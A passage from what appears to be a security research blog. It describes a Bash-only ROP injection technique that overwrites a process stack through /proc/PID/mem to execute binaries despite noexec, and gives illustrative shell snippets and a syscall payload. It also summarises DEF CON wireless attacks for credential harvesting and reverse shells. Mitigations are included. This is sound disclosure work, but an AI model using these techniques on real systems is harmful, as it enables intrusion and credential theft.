We can also call functions present in the PLT, which includes functions imported from external libraries such as glibc. Because these are called by pointer rather than by syscall number, we first need to parse the ELF section headers of the target library to find each function's offset. Once we have the offset, we can relocate it as with the gadgets and add it to our payload.
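The lookup amounts to resolving a symbol's file offset in the library. A sketch assuming a glibc-based system with binutils installed (the real script parses the ELF headers itself to stay dependency-free; readelf is shown here only to illustrate the lookup it performs):

```shell
# Resolve libc, then pull fexecve's value out of the dynamic symbol
# table. awk field 8 is the symbol name, field 2 its offset.
LIB=$(ldd /bin/sleep | grep -o '/[^ ]*libc[^ ]*' | head -n 1)
FEXECVE_OFF=$(readelf --dyn-syms --wide "$LIB" \
              | awk '$8 ~ /^fexecve/ { print $2; exit }')
echo "fexecve found in ${LIB} at offset 0x${FEXECVE_OFF}"
```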

String arguments are also handled: since we know the location of the stack in memory, we can append strings to our payload and add pointers to them as necessary. For example, the fexecve syscall requires a char** for its argument array. We can generate the array of pointers inside our payload before injection, and upon execution the pointer on the stack to that array can be used just like a normal stack-allocated char**.
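The pointer layout can be sketched as follows (STACK_ADDR and the argument strings are illustrative; the script reads the real stack address from /proc/${PID}/maps):

```shell
# Build the pointer array for an argv-style char**. Strings live at
# known offsets after the pointer table, so each pointer is simply the
# stack address plus that offset.
STACK_ADDR=$((0x7ffffffde000))
ARGS=("/tmp/payload" "-v")
OFFSET=$(( (${#ARGS[@]} + 1) * 8 ))    # skip N pointers + NULL terminator
for a in "${ARGS[@]}"; do
  printf 'argv entry 0x%x -> "%s"\n' $(( STACK_ADDR + OFFSET )) "$a"
  OFFSET=$(( OFFSET + ${#a} + 1 ))     # account for the trailing NUL byte
done
```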

Once the payload has been fully serialized, we can overwrite the stack inside the process using dd, with the offset to the stack obtained from the /proc/${PID}/maps file. To avoid permissions issues, the injection script must end with an ‘exec dd’ line, which replaces the bash process with the dd process and thereby transfers parental ownership of the sleep process from bash to dd.
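The overwrite step can be sketched like this, demonstrated against a scratch file standing in for /proc/${PID}/mem (the real script seeks to the stack address from the maps file and ends with ‘exec dd’):

```shell
# Write a payload at an absolute offset without truncating the target.
PAYLOAD=$(mktemp)
FAKE_MEM=$(mktemp)
printf 'ROPCHAIN' > "$PAYLOAD"
printf '%032d' 0 > "$FAKE_MEM"         # 32 zero bytes as a fake stack
STACK_OFFSET=8                         # really parsed from maps
dd if="$PAYLOAD" of="$FAKE_MEM" bs=1 seek="$STACK_OFFSET" \
   conv=notrunc 2>/dev/null
cat "$FAKE_MEM"; echo
```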

After the stack has been overwritten, we can then wait for the nanosleep syscall used by the sleep binary to return, at which point our ROP chain gains control of the application and our payload will be executed.

The specific payload to be injected as a ROP chain can reasonably be anything that does not require runtime logic. The current payload in use is a simple open/memfd_create/sendfile/fexecve program. This disassociates the target binary from the filesystem's noexec mount flag, and the binary is then executed from memory, bypassing the noexec restriction. Since the sleep binary is backgrounded on execution by bash, it is not possible to interact with the executed binary, as it has no parent after dd exits. To work around this restriction, it is possible to use one of the examples shipped in the libfuse distribution, assuming fuse is present on the target system: the passthrough binary creates a mirrored mount of the root filesystem at a destination directory. This new mount is not mounted noexec, so it is possible to browse through it to a binary, which will then be executable.
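Expressed in the pseudo-instruction form described earlier, such a payload might look like the following (hypothetical syntax and symbolic arguments; x86-64 syscall numbers; the actual payload description format is in the repository):

```
syscall 319 NAME 1                         # memfd_create(name, MFD_CLOEXEC)
syscall 2   PATH 0                         # open(target_binary, O_RDONLY)
syscall 40  MEMFD SRCFD 0 SIZE             # sendfile(memfd, srcfd, 0, size)
syscall 322 MEMFD EMPTY ARGV ENVP 0x1000   # execveat(AT_EMPTY_PATH), i.e. fexecve
```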

A proof-of-concept video shows this passthrough payload allowing execution of a binary in the current directory, as a standard child of the shell.

Future work:

To speed up execution, it would be useful to cache each gadget's offset from its respective ASLR base between the preload stage and the main run. This could be accomplished by dumping an associative array to disk using declare -p, but touching disk is not always appropriate. An alternative is to rearchitect the script so that the payload script executes in the same environment as the main bash process, rather than in a child executed using $(). This would allow environment variables to be shared bidirectionally.
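The declare -p caching idea can be sketched as follows (the offsets shown are illustrative, not real libc offsets):

```shell
# Serialize the gadget-offset table to disk, then restore it, as a
# later run of the script could do to skip the gadget search.
declare -A GADGETS=([pop_rax]=0x3ee88 [syscall]=0x26bd4)
CACHE=$(mktemp)
declare -p GADGETS > "$CACHE"          # dump the associative array
unset GADGETS
source "$CACHE"                        # restore it on the next run
echo "cached pop_rax offset: ${GADGETS[pop_rax]}"
```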

Limit the external dependencies further by removing the requirement for GNU grep. This was previously attempted and deemed too slow when finding gadgets, but may be possible with more optimised code.

The obvious mitigation for this technique is to set ptrace_scope to a more restrictive value. A value of 2 (superuser only) is the minimum that blocks this technique without completely disabling ptrace on the system, but care should be taken to ensure that ptrace as a normal user is not in legitimate use. This value can be set by adding the following line to /etc/sysctl.conf:

kernel.yama.ptrace_scope=2
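To apply the new value immediately rather than at next boot, the standard sysctl tooling can be used (as root):

```
sysctl -w kernel.yama.ptrace_scope=2   # set the value immediately
sysctl -p                              # or reload /etc/sysctl.conf
```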

Other mitigation strategies include combinations of Seccomp, SELinux or Apparmor to restrict the permissions on sensitive files such as /proc/${PID}/maps or /proc/${PID}/mem.

The proof-of-concept code and Bash ROP generator can be found at https://github.com/GDSSecurity/Cexigua.

Thursday
Aug312017

Whitepaper: The Black Art of Wireless Post-Exploitation - Bypassing Port-Based Access Controls Using Indirect Wireless Pivots

At DEF CON 25 we introduced a novel attack that can be used to bypass port-based access controls in WPA2-EAP networks. We call this technique an Indirect Wireless Pivot. The attack, which affects networks implemented using EAP-PEAP or EAP-TTLS, takes advantage of the fact that port-based access control mechanisms rely on the assumption that the physical layer can be trusted. Just as a NAC cannot effectively protect network endpoints if the attacker has physical access to a switch, a NAC can also be bypassed if the attacker can freely control the physical layer using rogue access point attacks. The fact that this technique is possible invalidates some common assumptions about wireless security. Specifically, it demonstrates that port-based NAC mechanisms do not effectively mitigate the risk presented by weak WPA2-EAP implementations. 

While creating the Indirect Wireless Pivot, we also developed a second technique that we call the Hostile Portal Attack. This second technique can be used to perform SMB Relay attacks and harvest Active Directory credentials without direct network access. Both techniques are briefly described below, and in greater detail in the attached PowerPoint slides and whitepaper.
     

Hostile Portal Attacks

This is a weaponization of the captive portals typically used to restrict access to open networks in environments such as hotels and coffee shops. Instead of redirecting HTTP traffic to a login page, the hostile portal redirects it to an SMB share located on the attacker’s machine. The result is that after the victim is forced to associate with the attacker using a rogue access point attack, any HTTP traffic generated by the victim will cause the victim’s machine to attempt NTLM authentication with the attacker. The attacker also performs an LLMNR/NBT-NS poisoning attack against the victim.
The Hostile Portal Attack yields results similar to LLMNR/NBT-NS poisoning, with some distinct advantages:
  • Stealthy: No direct network access is required
  • Large Area of Effect: Works across multiple subnets – you get everything that is connected to the wireless network
  • Efficient: This is an active attack that forces clients to authenticate with you. The attacker does not have to wait for a network event to occur, as with LLMNR/NBT-NS poisoning. 

Indirect Wireless Pivots

The Indirect Wireless Pivot is a technique for bypassing port-based access control mechanisms using rogue access point attacks. The attacker first uses a rogue AP attack to coerce one or more victims into connecting. A Hostile Portal Attack is then combined with an SMB Relay attack to place a timed payload on the client. The rogue access point is then terminated, allowing the client to reassociate with the target network. After a delay, the payload will execute, causing the client to send a reverse shell back to the attacker’s first interface. Alternatively, this attack can be used to place an implant on the client device.
   

PowerPoint Slides and Whitepaper:

For an in-depth look at both of these attacks, check out the PowerPoint slides and whitepaper on the subject.

PowerPoint Slides:
Whitepaper: